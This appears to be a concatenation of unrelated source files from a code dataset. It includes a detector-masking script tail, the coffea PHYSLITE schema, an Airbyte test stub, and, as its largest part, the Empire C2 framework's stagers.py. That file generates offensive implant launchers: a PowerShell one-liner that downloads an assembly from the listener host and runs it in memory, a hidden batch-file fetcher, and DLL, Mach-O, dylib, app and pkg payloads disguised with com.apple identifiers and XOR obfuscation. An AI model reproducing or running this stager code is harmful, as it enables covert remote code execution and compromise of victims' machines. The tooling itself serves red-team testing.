bcx, bcy = panel.get_beam_centre(avg_f.get_beam().get_s0())
if poly_mask is not None or circle_mask is not None:
minx = miny = 0
maxx = avg_d.focus()[0]
maxy = avg_d.focus()[1]
if poly_mask is not None:
minx = min([x[0] for x in poly_mask])
miny = min([y[1] for y in poly_mask])
maxx = max([x[0] for x in poly_mask])
maxy = max([y[1] for y in poly_mask])
if circle_mask is not None:
circle_x, circle_y, radius = circle_mask
if circle_x - radius < minx: minx = circle_x - radius
if circle_y - radius < miny: miny = circle_y - radius
if circle_x + radius > maxx: maxx = circle_x + radius
if circle_y + radius > maxy: maxy = circle_y + radius
sel = avg_d == command_line.options.mask_pix_val
for j in range(miny, maxy):
for i in range(minx, maxx):
idx = j * avg_d.focus()[0] + i
if not sel[idx]:
if poly_mask is not None and point_in_polygon((i,j),poly_mask):
sel[idx] = True
elif circle_mask is not None and point_inside_circle(i,j,circle_x,circle_y,radius):
sel[idx] = True
avg_d.set_selected(sel,command_line.options.mask_pix_val)
# have to re-layout the data to match how it was stored originally
shifted_int_data_old = avg_d
shifted_int_data_new = shifted_int_data_old.__class__(
flex.grid(shifted_int_data_old.focus()))
shifted_int_data_new += command_line.options.mask_pix_val
phil = avg_i.horizons_phil_cache
manager = avg_i.get_tile_manager(phil)
for i,shift in enumerate(manager.effective_translations()):
shift_slow = shift[0]
shift_fast = shift[1]
ur_slow = phil.distl.detector_tiling[4 * i + 0] + shift_slow
ur_fast = phil.distl.detector_tiling[4 * i + 1] + shift_fast
ll_slow = phil.distl.detector_tiling[4 * i + 2] + shift_slow
ll_fast = phil.distl.detector_tiling[4 * i + 3] + shift_fast
#print "Shifting tile at (%d, %d) by (%d, %d)" % (ur_slow-shift_slow, ur_fast-shift_fast, -shift_slow, -shift_fast)
shifted_int_data_new.matrix_paste_block_in_place(
block = shifted_int_data_old.matrix_copy_block(
i_row=ur_slow,i_column=ur_fast,
n_rows=ll_slow-ur_slow, n_columns=ll_fast-ur_fast),
i_row = ur_slow - shift_slow,
i_column = ur_fast - shift_fast
)
d = dpack(
active_areas=avg_i.parameters['ACTIVE_AREAS'],
address=address,
beam_center_x=bcx,
beam_center_y=bcy,
data=shifted_int_data_new,
distance=avg_i.distance,
timestamp=timestamp,
wavelength=avg_i.wavelength,
xtal_target=None,
pixel_size=avg_i.pixel_size,
saturated_value=avg_i.saturation)
dwritef2(d, command_line.options.destpath)
#the minimum number of pixels to mask out cooresponding to the interstitial regions for the CS-PAD
min_count = 818265 # (1765 * 1765) - (194 * 185 * 64)
masked_out = len(avg_d.as_1d().select((avg_d == command_line.options.mask_pix_val).as_1d()))
assert masked_out >= min_count
print("Masked out %d pixels out of %d (%.2f%%)"% \
(masked_out-min_count,len(avg_d)-min_count,(masked_out-min_count)*100/(len(avg_d)-min_count)))
if (__name__ == "__main__"):
sys.exit(run())
|
606adf8960ab60905df8ddde46640e79eefc88a4
|
6a017c87a1c3e016de5e1704d23d1d2034fab41c
|
/src/coffea/nanoevents/schemas/physlite.py
|
1b9b892056948a89512baf771db6f8dc11a54782
|
[
"BSD-3-Clause"
] |
permissive
|
CoffeaTeam/coffea
|
53997aefbccf583cc901718b5c639a4b4535dbcd
|
a33fc173f3bf2be307bac6517e624fc6ce0c4c3e
|
refs/heads/master
| 2023-08-10T12:36:49.238010
| 2023-08-02T02:57:18
| 2023-08-02T02:57:18
| 159,673,139
| 116
| 100
|
BSD-3-Clause
| 2023-09-12T20:32:08
| 2018-11-29T13:47:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,670
|
py
|
physlite.py
|
import copy
import warnings
from collections import defaultdict
from coffea.nanoevents.schemas.base import BaseSchema, zip_forms
from coffea.nanoevents.util import quote
class PHYSLITESchema(BaseSchema):
"""PHYSLITE schema builder - work in progress.
This is a schema for the `ATLAS DAOD_PHYSLITE derivation
<https://gitlab.cern.ch/atlas/athena/-/blob/release/21.2.108.0/PhysicsAnalysis/DerivationFramework/DerivationFrameworkPhys/share/PHYSLITE.py>`_.
Closely following `schemas.nanoaod.NanoAODSchema`, it is mainly build from
naming patterns where the "Analysis" prefix has been removed, so the
collections will be named Electrons, Muons, instead of AnalysisElectrons,
AnalysisMunos, etc. The collection fields correspond to the "Aux" and
"AuxDyn" columns.
Collections are assigned mixin types according to the `mixins` mapping.
All collections are then zipped into one `base.NanoEvents` record and returned.
Cross references are build from ElementLink columns. Global indices are
created dynamically, using an ``_eventindex`` field that is attached to
each collection.
"""
__dask_capable__ = True
truth_collections = [
"TruthPhotons",
"TruthMuons",
"TruthNeutrinos",
"TruthTaus",
"TruthElectrons",
"TruthBoson",
"TruthBottom",
"TruthTop",
]
"""TRUTH3 collection names.
TruthParticle behavior is assigned to all of them and global index forms
for parent/children relations are created for all combinations.
"""
mixins = {
"Electrons": "Electron",
"Muons": "Muon",
"Jets": "Particle",
"TauJets": "Particle",
"CombinedMuonTrackParticles": "TrackParticle",
"ExtrapolatedMuonTrackParticles": "TrackParticle",
"GSFTrackParticles": "TrackParticle",
"InDetTrackParticles": "TrackParticle",
"MuonSpectrometerTrackParticles": "TrackParticle",
}
"""Default configuration for mixin types, based on the collection name.
The types are implemented in the `coffea.nanoevents.methods.physlite` module.
"""
for _k in truth_collections:
mixins[_k] = "TruthParticle"
def __init__(self, base_form, *args, **kwargs):
super().__init__(base_form)
form_dict = {
key: form for key, form in zip(self._form["fields"], self._form["contents"])
}
output = self._build_collections(form_dict)
self._form["fields"] = [k for k in output.keys()]
self._form["contents"] = [v for v in output.values()]
def _build_collections(self, branch_forms):
zip_groups = defaultdict(list)
has_eventindex = defaultdict(bool)
for key, ak_form in branch_forms.items():
# Normal fields
key_fields = key.split("/")[-1].split(".")
top_key = key_fields[0]
sub_key = ".".join(key_fields[1:])
objname = top_key.replace("Analysis", "").replace("AuxDyn", "")
zip_groups[objname].append(((key, sub_key), ak_form))
# add eventindex form, based on the first single-jagged list column
if (
not has_eventindex[objname]
and "List" in ak_form["class"]
and "List" not in ak_form["content"]["class"]
):
zip_groups[objname].append(
((key, "_eventindex"), self._create_eventindex_form(ak_form, key))
)
has_eventindex[objname] = True
# zip the forms
contents = {}
for objname, keys_and_form in zip_groups.items():
to_zip = {}
for (key, sub_key), form in keys_and_form:
if "." in sub_key:
# we can skip fields with '.' in the name since they will come again as records
# e.g. truthParticleLink.m_persKey will also appear in truthParticleLink
# (record with fields m_persKey and m_persIndex)
continue
if form["class"] == "RecordArray" and form["fields"]:
# single-jagged ElementLinks come out as RecordArray(ListOffsetArray)
# the zipping converts the forms to ListOffsetArray(RecordArray)
fields = [field.split(".")[-1] for field in form["fields"]]
form = zip_forms(
dict(zip(fields, form["contents"])),
sub_key,
)
to_zip[sub_key] = form
try:
contents[objname] = zip_forms(
to_zip,
objname,
self.mixins.get(objname, None),
bypass=True,
)
content = contents[objname]["content"]
content["parameters"] = dict(
content.get("parameters", {}), collection_name=objname
)
except NotImplementedError:
warnings.warn(f"Can't zip collection {objname}")
return contents
@staticmethod
def _create_eventindex_form(base_form, key):
form = copy.deepcopy(base_form)
form["content"] = {
"class": "NumpyArray",
"parameters": {},
"form_key": quote(f"{key},!load,!eventindex,!content"),
"itemsize": 8,
"primitive": "int64",
}
return form
@property
def behavior(self):
"""Behaviors necessary to implement this schema"""
from coffea.nanoevents.methods import physlite
return physlite.behavior
|
2e80d0c442d654a9cb7ad25b2d7474147618c851
|
1eca7ab68f713f9134549be8cff40d953d784326
|
/empire/server/common/stagers.py
|
5985787dc67af7892a43a99c6c83c42cc30237ec
|
[
"BSD-3-Clause"
] |
permissive
|
BC-SECURITY/Empire
|
65576ac931635cded054912a02ed5d02a1b41f8d
|
5b2ad2c2e9b9f996e40c484215dfea36fefc808d
|
refs/heads/main
| 2023-09-04T05:00:52.366894
| 2023-08-27T22:08:54
| 2023-08-27T22:08:54
| 199,975,883
| 3,651
| 601
|
BSD-3-Clause
| 2023-09-08T05:50:26
| 2019-08-01T04:22:31
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 29,359
|
py
|
stagers.py
|
"""
Functionality that loads Empire stagers, sets generic stager options,
and abstracts the invocation of launcher generation.
The Stagers() class in instantiated in ./server.py by the main menu and includes:
generate_launcher() - abstracted functionality that invokes the generate_launcher() method for a given listener
generate_dll() - generates a PowerPick Reflective DLL to inject with base64-encoded stager code
generate_macho() - generates a macho binary with an embedded python interpreter that runs the launcher code
generate_dylib() - generates a dylib with an embedded python interpreter and runs launcher code when loaded into an application
"""
from __future__ import absolute_import, division
import base64
import errno
import logging
import os
import shutil
import string
import subprocess
import zipfile
from builtins import chr, object, str, zip
from itertools import cycle
import donut
import macholib.MachO
from empire.server.core.db import models
from empire.server.core.db.base import SessionLocal
from empire.server.utils import data_util
from empire.server.utils.math_util import old_div
from . import helpers
log = logging.getLogger(__name__)
class Stagers(object):
def __init__(self, MainMenu, args):
self.mainMenu = MainMenu
self.args = args
def generate_launcher_fetcher(
self,
language=None,
encode=True,
webFile="http://127.0.0.1/launcher.bat",
launcher="powershell -noP -sta -w 1 -enc ",
):
# TODO add handle for other than powershell language
stager = (
'wget "'
+ webFile
+ '" -outfile "launcher.bat"; Start-Process -FilePath .\launcher.bat -Wait -passthru -WindowStyle Hidden;'
)
if encode:
return helpers.powershell_launcher(stager, launcher)
else:
return stager
def generate_launcher(
self,
listenerName,
language=None,
encode=True,
obfuscate=False,
obfuscation_command="",
userAgent="default",
proxy="default",
proxyCreds="default",
stagerRetries="0",
safeChecks="true",
bypasses: str = "",
):
"""
Abstracted functionality that invokes the generate_launcher() method for a given listener,
if it exists.
"""
with SessionLocal.begin() as db:
bypasses_parsed = []
for bypass in bypasses.split(" "):
bypass = (
db.query(models.Bypass).filter(models.Bypass.name == bypass).first()
)
if bypass:
if bypass.language == language:
bypasses_parsed.append(bypass.code)
else:
log.warning(f"Invalid bypass language: {bypass.language}")
db_listener = self.mainMenu.listenersv2.get_by_name(db, listenerName)
active_listener = self.mainMenu.listenersv2.get_active_listener(
db_listener.id
)
if not active_listener:
log.error(f"Invalid listener: {listenerName}")
return ""
launcher_code = active_listener.generate_launcher(
encode=encode,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds,
stagerRetries=stagerRetries,
language=language,
listenerName=listenerName,
safeChecks=safeChecks,
bypasses=bypasses_parsed,
)
if launcher_code:
return launcher_code
def generate_dll(self, poshCode, arch):
"""
Generate a PowerPick Reflective DLL to inject with base64-encoded stager code.
"""
# read in original DLL and patch the bytes based on arch
if arch.lower() == "x86":
origPath = "%s/data/misc/ReflectivePick_x86_orig.dll" % (
self.mainMenu.installPath
)
else:
origPath = "%s/data/misc/ReflectivePick_x64_orig.dll" % (
self.mainMenu.installPath
)
if os.path.isfile(origPath):
dllRaw = ""
with open(origPath, "rb") as f:
dllRaw = f.read()
replacementCode = helpers.decode_base64(poshCode)
# patch the dll with the new PowerShell code
searchString = (("Invoke-Replace").encode("UTF-16"))[2:]
index = dllRaw.find(searchString)
dllPatched = (
dllRaw[:index]
+ replacementCode
+ dllRaw[(index + len(replacementCode)) :]
)
return dllPatched
else:
log.error(f"Original .dll for arch {arch} does not exist!")
def generate_powershell_exe(
self, posh_code, dot_net_version="net40", obfuscate=False
):
"""
Generate powershell launcher embedded in csharp
"""
with open(self.mainMenu.installPath + "/stagers/CSharpPS.yaml", "rb") as f:
stager_yaml = f.read()
stager_yaml = stager_yaml.decode("UTF-8")
# Write text file to resources to be embedded
with open(
self.mainMenu.installPath
+ "/csharp/Covenant/Data/EmbeddedResources/launcher.txt",
"w",
) as f:
f.write(posh_code)
compiler = self.mainMenu.pluginsv2.get_by_id("csharpserver")
if not compiler.status == "ON":
log.error("csharpserver plugin not running")
else:
file_name = compiler.do_send_stager(
stager_yaml, "CSharpPS", confuse=obfuscate
)
directory = f"{self.mainMenu.installPath}/csharp/Covenant/Data/Tasks/CSharp/Compiled/{dot_net_version}/{file_name}.exe"
return directory
def generate_powershell_shellcode(
self, posh_code, arch="both", dot_net_version="net40"
):
"""
Generate powershell shellcode using donut python module
"""
if arch == "x86":
arch_type = 1
elif arch == "x64":
arch_type = 2
elif arch == "both":
arch_type = 3
directory = self.generate_powershell_exe(posh_code, dot_net_version)
shellcode = donut.create(file=directory, arch=arch_type)
return shellcode
def generate_exe_oneliner(
self, language, obfuscate, obfuscation_command, encode, listener_name
):
"""
Generate a oneliner for a executable
"""
listener = self.mainMenu.listenersv2.get_active_listener_by_name(listener_name)
if getattr(listener, "parent_listener", None) is not None:
hop = listener.options["Name"]["Value"]
while getattr(listener, "parent_listener", None) is not None:
listener = self.mainMenu.listenersv2.get_active_listener_by_name(
listener.parent_listener.name
)
else:
hop = ""
host = listener.options["Host"]["Value"]
launcher_front = listener.options["Launcher"]["Value"]
# Encoded launcher requires a sleep
launcher = f"""
$wc=New-Object System.Net.WebClient;
$bytes=$wc.DownloadData("{host}/download/{language}/{hop}");
$assembly=[Reflection.Assembly]::load($bytes);
$assembly.GetType("Program").GetMethod("Main").Invoke($null, $null);
"""
# Remove comments and make one line
launcher = helpers.strip_powershell_comments(launcher)
launcher = data_util.ps_convert_to_oneliner(launcher)
if obfuscate:
launcher = self.mainMenu.obfuscationv2.obfuscate(
launcher,
obfuscation_command=obfuscation_command,
)
# base64 encode the stager and return it
if encode and (
(not obfuscate) or ("launcher" not in obfuscation_command.lower())
):
return helpers.powershell_launcher(launcher, launcher_front)
else:
# otherwise return the case-randomized stager
return launcher
def generate_python_exe(
self, python_code, dot_net_version="net40", obfuscate=False
):
"""
Generate ironpython launcher embedded in csharp
"""
with open(self.mainMenu.installPath + "/stagers/CSharpPy.yaml", "rb") as f:
stager_yaml = f.read()
stager_yaml = stager_yaml.decode("UTF-8")
# Write text file to resources to be embedded
with open(
self.mainMenu.installPath
+ "/csharp/Covenant/Data/EmbeddedResources/launcher.txt",
"w",
) as f:
f.write(python_code)
compiler = self.mainMenu.pluginsv2.get_by_id("csharpserver")
if not compiler.status == "ON":
log.error("csharpserver plugin not running")
else:
file_name = compiler.do_send_stager(
stager_yaml, "CSharpPy", confuse=obfuscate
)
directory = f"{self.mainMenu.installPath}/csharp/Covenant/Data/Tasks/CSharp/Compiled/{dot_net_version}/{file_name}.exe"
return directory
def generate_python_shellcode(
self, posh_code, arch="both", dot_net_version="net40"
):
"""
Generate ironpython shellcode using donut python module
"""
if arch == "x86":
arch_type = 1
elif arch == "x64":
arch_type = 2
elif arch == "both":
arch_type = 3
directory = self.generate_python_exe(posh_code, dot_net_version)
shellcode = donut.create(file=directory, arch=arch_type)
return shellcode
def generate_macho(self, launcherCode):
"""
Generates a macho binary with an embedded python interpreter that runs the launcher code.
"""
MH_EXECUTE = 2
# with open(self.installPath + "/data/misc/machotemplate", 'rb') as f:
with open(
"%s/data/misc/machotemplate" % (self.mainMenu.installPath), "rb"
) as f:
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_EXECUTE:
log.error("Macho binary template is not the correct filetype")
return ""
cmds = macho.headers[0].commands
for cmd in cmds:
count = 0
if int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64:
count += 1
if (
cmd[count].segname.strip(b"\x00") == b"__TEXT"
and cmd[count].nsects > 0
):
count += 1
for section in cmd[count]:
if section.sectname.strip(b"\x00") == b"__cstring":
offset = int(section.offset) + (
int(section.size) - 2119
)
placeHolderSz = int(section.size) - (
int(section.size) - 2119
)
template = f.read()
if placeHolderSz and offset:
key = "subF"
launcherCode = "".join(
chr(ord(x) ^ ord(y)) for (x, y) in zip(launcherCode, cycle(key))
)
launcherCode = base64.urlsafe_b64encode(launcherCode.encode("utf-8"))
launcher = launcherCode + b"\x00" * (placeHolderSz - len(launcherCode))
patchedMachO = (
template[:offset] + launcher + template[(offset + len(launcher)) :]
)
return patchedMachO
else:
log.error("Unable to patch MachO binary")
def generate_dylib(self, launcherCode, arch, hijacker):
"""
Generates a dylib with an embedded python interpreter and runs launcher code when loaded into an application.
"""
import macholib.MachO
MH_DYLIB = 6
if hijacker.lower() == "true":
if arch == "x86":
f = open(
"%s/data/misc/hijackers/template.dylib"
% (self.mainMenu.installPath),
"rb",
)
else:
f = open(
"%s/data/misc/hijackers/template64.dylib"
% (self.mainMenu.installPath),
"rb",
)
else:
if arch == "x86":
f = open(
"%s/data/misc/templateLauncher.dylib" % (self.mainMenu.installPath),
"rb",
)
else:
f = open(
"%s/data/misc/templateLauncher64.dylib"
% (self.mainMenu.installPath),
"rb",
)
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_DYLIB:
log.error("Dylib template is not the correct filetype")
return ""
cmds = macho.headers[0].commands
for cmd in cmds:
count = 0
if (
int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64
or int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT
):
count += 1
if (
cmd[count].segname.strip(b"\x00") == b"__TEXT"
and cmd[count].nsects > 0
):
count += 1
for section in cmd[count]:
if section.sectname.strip(b"\x00") == b"__cstring":
offset = int(section.offset)
placeHolderSz = int(section.size) - 52
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode + "\x00" * (placeHolderSz - len(launcherCode))
if isinstance(launcher, str):
launcher = launcher.encode("UTF-8")
patchedDylib = b"".join(
[template[:offset], launcher, template[(offset + len(launcher)) :]]
)
return patchedDylib
else:
log.error("Unable to patch dylib")
def generate_appbundle(self, launcherCode, Arch, icon, AppName, disarm):
"""
Generates an application. The embedded executable is a macho binary with the python interpreter.
"""
MH_EXECUTE = 2
if Arch == "x64":
f = open(
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher",
"rb",
)
directory = (
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x64/launcher.app/"
)
else:
f = open(
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher",
"rb",
)
directory = (
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/x86/launcher.app/"
)
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_EXECUTE:
log.error("Macho binary template is not the correct filetype")
return ""
cmds = macho.headers[0].commands
for cmd in cmds:
count = 0
if (
int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64
or int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT
):
count += 1
if (
cmd[count].segname.strip(b"\x00") == b"__TEXT"
and cmd[count].nsects > 0
):
count += 1
for section in cmd[count]:
if section.sectname.strip(b"\x00") == b"__cstring":
offset = int(section.offset)
placeHolderSz = int(section.size) - 52
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode.encode("utf-8") + b"\x00" * (
placeHolderSz - len(launcherCode)
)
patchedBinary = (
template[:offset] + launcher + template[(offset + len(launcher)) :]
)
if AppName == "":
AppName = "launcher"
tmpdir = "/tmp/application/%s.app/" % AppName
shutil.copytree(directory, tmpdir)
f = open(tmpdir + "Contents/MacOS/launcher", "wb")
if disarm is not True:
f.write(patchedBinary)
f.close()
else:
t = open(
self.mainMenu.installPath
+ "/data/misc/apptemplateResources/empty/macho",
"rb",
)
w = t.read()
f.write(w)
f.close()
t.close()
os.rename(
tmpdir + "Contents/MacOS/launcher",
tmpdir + "Contents/MacOS/%s" % AppName,
)
os.chmod(tmpdir + "Contents/MacOS/%s" % AppName, 0o755)
if icon != "":
iconfile = os.path.splitext(icon)[0].split("/")[-1]
shutil.copy2(icon, tmpdir + "Contents/Resources/" + iconfile + ".icns")
else:
iconfile = icon
appPlist = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>BuildMachineOSBuild</key>
<string>15G31</string>
<key>CFBundleDevelopmentRegion</key>
<string>en</string>
<key>CFBundleExecutable</key>
<string>%s</string>
<key>CFBundleIconFile</key>
<string>%s</string>
<key>CFBundleIdentifier</key>
<string>com.apple.%s</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>%s</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleSignature</key>
<string>????</string>
<key>CFBundleSupportedPlatforms</key>
<array>
<string>MacOSX</string>
</array>
<key>CFBundleVersion</key>
<string>1</string>
<key>DTCompiler</key>
<string>com.apple.compilers.llvm.clang.1_0</string>
<key>DTPlatformBuild</key>
<string>7D1014</string>
<key>DTPlatformVersion</key>
<string>GM</string>
<key>DTSDKBuild</key>
<string>15E60</string>
<key>DTSDKName</key>
<string>macosx10.11</string>
<key>DTXcode</key>
<string>0731</string>
<key>DTXcodeBuild</key>
<string>7D1014</string>
<key>LSApplicationCategoryType</key>
<string>public.app-category.utilities</string>
<key>LSMinimumSystemVersion</key>
<string>10.11</string>
<key>LSUIElement</key>
<true/>
<key>NSHumanReadableCopyright</key>
<string>Copyright 2016 Apple. All rights reserved.</string>
<key>NSMainNibFile</key>
<string>MainMenu</string>
<key>NSPrincipalClass</key>
<string>NSApplication</string>
</dict>
</plist>
""" % (
AppName,
iconfile,
AppName,
AppName,
)
with open(tmpdir + "Contents/Info.plist", "w") as f:
f.write(appPlist)
shutil.make_archive("/tmp/launcher", "zip", "/tmp/application")
shutil.rmtree("/tmp/application")
with open("/tmp/launcher.zip", "rb") as f:
zipbundle = f.read()
os.remove("/tmp/launcher.zip")
return zipbundle
else:
log.error("Unable to patch application")
def generate_pkg(self, launcher, bundleZip, AppName):
# unzip application bundle zip. Copy everything for the installer pkg to a temporary location
os.chdir("/tmp/")
with open("app.zip", "wb") as f:
f.write(bundleZip)
zipf = zipfile.ZipFile("app.zip", "r")
zipf.extractall()
zipf.close()
os.remove("app.zip")
os.system("cp -r " + self.mainMenu.installPath + "/data/misc/pkgbuild/ /tmp/")
os.chdir("pkgbuild")
os.system("cp -r ../" + AppName + ".app root/Applications/")
os.system("chmod +x root/Applications/")
subprocess.call(
"( cd root && find . | cpio -o --format odc --owner 0:80 | gzip -c ) > expand/Payload",
shell=True,
stderr=subprocess.DEVNULL,
)
os.system("chmod +x expand/Payload")
with open("scripts/postinstall", "r+") as s:
script = s.read()
script = script.replace("LAUNCHER", launcher)
s.seek(0)
s.write(script)
subprocess.call(
"( cd scripts && find . | cpio -o --format odc --owner 0:80 | gzip -c ) > expand/Scripts",
shell=True,
stderr=subprocess.DEVNULL,
)
os.system("chmod +x expand/Scripts")
numFiles = subprocess.check_output("find root | wc -l", shell=True).strip(b"\n")
size = subprocess.check_output("du -b -s root", shell=True).split(b"\t")[0]
size = old_div(int(size), 1024)
with open("expand/PackageInfo", "w+") as p:
pkginfo = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<pkg-info overwrite-permissions="true" relocatable="false" identifier="com.apple.APPNAME" postinstall-action="none" version="1.0" format-version="2" generator-version="InstallCmds-554 (15G31)" install-location="/" auth="root">
<payload numberOfFiles="KEY1" installKBytes="KEY2"/>
<bundle path="./APPNAME.app" id="com.apple.APPNAME" CFBundleShortVersionString="1.0" CFBundleVersion="1"/>
<bundle-version>
<bundle id="com.apple.APPNAME"/>
</bundle-version>
<upgrade-bundle>
<bundle id="com.apple.APPNAME"/>
</upgrade-bundle>
<update-bundle/>
<atomic-update-bundle/>
<strict-identifier>
<bundle id="com.apple.APPNAME"/>
</strict-identifier>
<relocate>
<bundle id="com.apple.APPNAME"/>
</relocate>
<scripts>
<postinstall file="./postinstall"/>
</scripts>
</pkg-info>
"""
pkginfo = pkginfo.replace("APPNAME", AppName)
pkginfo = pkginfo.replace("KEY1", numFiles.decode("UTF-8"))
pkginfo = pkginfo.replace("KEY2", str(size))
p.write(pkginfo)
os.system("mkbom -u 0 -g 80 root expand/Bom")
os.system("chmod +x expand/Bom")
os.system("chmod -R 755 expand/")
os.system('( cd expand && xar --compression none -cf "../launcher.pkg" * )')
with open("launcher.pkg", "rb") as f:
package = f.read()
os.chdir("/tmp/")
shutil.rmtree("pkgbuild")
shutil.rmtree(AppName + ".app")
return package
def generate_jar(self, launcherCode):
with open(self.mainMenu.installPath + "/data/misc/Run.java", "r") as f:
javacode = f.read()
javacode = javacode.replace("LAUNCHER", launcherCode)
jarpath = self.mainMenu.installPath + "/data/misc/classes/com/installer/apple/"
try:
os.makedirs(jarpath)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
pass
with open(jarpath + "Run.java", "w") as f:
f.write(javacode)
os.system(
"javac "
+ self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.java"
)
os.system(
"jar -cfe "
+ self.mainMenu.installPath
+ "/data/misc/Run.jar com.installer.apple.Run "
+ self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.class"
)
os.remove(
self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.class"
)
os.remove(
self.mainMenu.installPath
+ "/data/misc/classes/com/installer/apple/Run.java"
)
with open(self.mainMenu.installPath + "/data/misc/Run.jar", "rb") as jarfile:
jar = jarfile.read()
os.remove(self.mainMenu.installPath + "/data/misc/Run.jar")
return jar
def generate_upload(self, file, path):
script = """
$b64 = "BASE64_BLOB_GOES_HERE"
$filename = "FILE_UPLOAD_FULL_PATH_GOES_HERE"
[IO.FILE]::WriteAllBytes($filename, [Convert]::FromBase64String($b64))
"""
file_encoded = base64.b64encode(file).decode("UTF-8")
script = script.replace("BASE64_BLOB_GOES_HERE", file_encoded)
script = script.replace("FILE_UPLOAD_FULL_PATH_GOES_HERE", path)
return script
def generate_stageless(self, options):
listener_name = options["Listener"]["Value"]
if options["Language"]["Value"] == "ironpython":
language = "python"
version = "ironpython"
else:
language = options["Language"]["Value"]
version = ""
active_listener = self.mainMenu.listenersv2.get_active_listener_by_name(
listener_name
)
chars = string.ascii_uppercase + string.digits
session_id = helpers.random_string(length=8, charset=chars)
staging_key = active_listener.options["StagingKey"]["Value"]
delay = active_listener.options["DefaultDelay"]["Value"]
jitter = active_listener.options["DefaultJitter"]["Value"]
profile = active_listener.options["DefaultProfile"]["Value"]
kill_date = active_listener.options["KillDate"]["Value"]
working_hours = active_listener.options["WorkingHours"]["Value"]
lost_limit = active_listener.options["DefaultLostLimit"]["Value"]
if "Host" in active_listener.options:
host = active_listener.options["Host"]["Value"]
else:
host = ""
with SessionLocal.begin() as db:
agent = self.mainMenu.agents.add_agent(
session_id,
"0.0.0.0",
delay,
jitter,
profile,
kill_date,
working_hours,
lost_limit,
listener=listener_name,
language=language,
db=db,
)
# update the agent with this new information
self.mainMenu.agents.update_agent_sysinfo_db(
db,
session_id,
listener=listener_name,
internal_ip="0.0.0.0",
username="blank\\blank",
hostname="blank",
os_details="blank",
high_integrity=0,
process_name="blank",
process_id=99999,
language_version=2,
language=language,
architecture="AMD64",
)
# get the agent's session key
session_key = agent.session_key
agent_code = active_listener.generate_agent(
active_listener.options, language=language, version=version
)
comms_code = active_listener.generate_comms(
active_listener.options, language=language
)
stager_code = active_listener.generate_stager(
active_listener.options, language=language, encrypt=False, encode=False
)
if options["Language"]["Value"] == "powershell":
launch_code = (
"\nInvoke-Empire -Servers @('%s') -StagingKey '%s' -SessionKey '%s' -SessionID '%s';"
% (host, staging_key, session_key, session_id)
)
full_agent = comms_code + "\n" + agent_code + "\n" + launch_code
return full_agent
elif options["Language"]["Value"] in ["python", "ironpython"]:
stager_code = stager_code.replace(
"b''.join(random.choice(string.ascii_uppercase + string.digits).encode('UTF-8') for _ in range(8))",
f"b'{session_id}'",
)
stager_code = stager_code.split("clientPub=DiffieHellman()")[0]
stager_code = stager_code + f"\nkey = b'{session_key}'"
launch_code = ""
if active_listener.info["Name"] == "HTTP[S] MALLEABLE":
full_agent = "\n".join(
[stager_code, agent_code, comms_code, launch_code]
)
else:
full_agent = "\n".join([stager_code, agent_code, launch_code])
return full_agent
|
dc1dc7927f75216bf18f303f4970e466f1b1f794
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/dts/airbyte/airbyte-integrations/connectors/source-google-sheets/unit_tests/test_helpers.py
|
d886b9d59cc0a2d558cbca5e91e212bb5ce7dfe4
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause",
"Elastic-2.0"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 11,655
|
py
|
test_helpers.py
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import unittest
from unittest.mock import Mock, patch
from airbyte_cdk.logger import AirbyteLogger
from airbyte_cdk.models.airbyte_protocol import (
AirbyteRecordMessage,
AirbyteStream,
ConfiguredAirbyteCatalog,
ConfiguredAirbyteStream,
DestinationSyncMode,
SyncMode,
)
from source_google_sheets.client import GoogleSheetsClient
from source_google_sheets.helpers import Helpers
from source_google_sheets.models import CellData, GridData, RowData, Sheet, SheetProperties, Spreadsheet
logger = AirbyteLogger()
def google_sheet_client(row_data, spreadsheet_id, client):
fake_response = Spreadsheet(
spreadsheetId=spreadsheet_id,
sheets=[Sheet(data=[GridData(rowData=row_data)])],
)
client.get.return_value.execute.return_value = fake_response
with patch.object(GoogleSheetsClient, "__init__", lambda s, credentials, scopes: None):
sheet_client = GoogleSheetsClient({"fake": "credentials"}, ["auth_scopes"])
sheet_client.client = client
return sheet_client
class TestHelpers(unittest.TestCase):
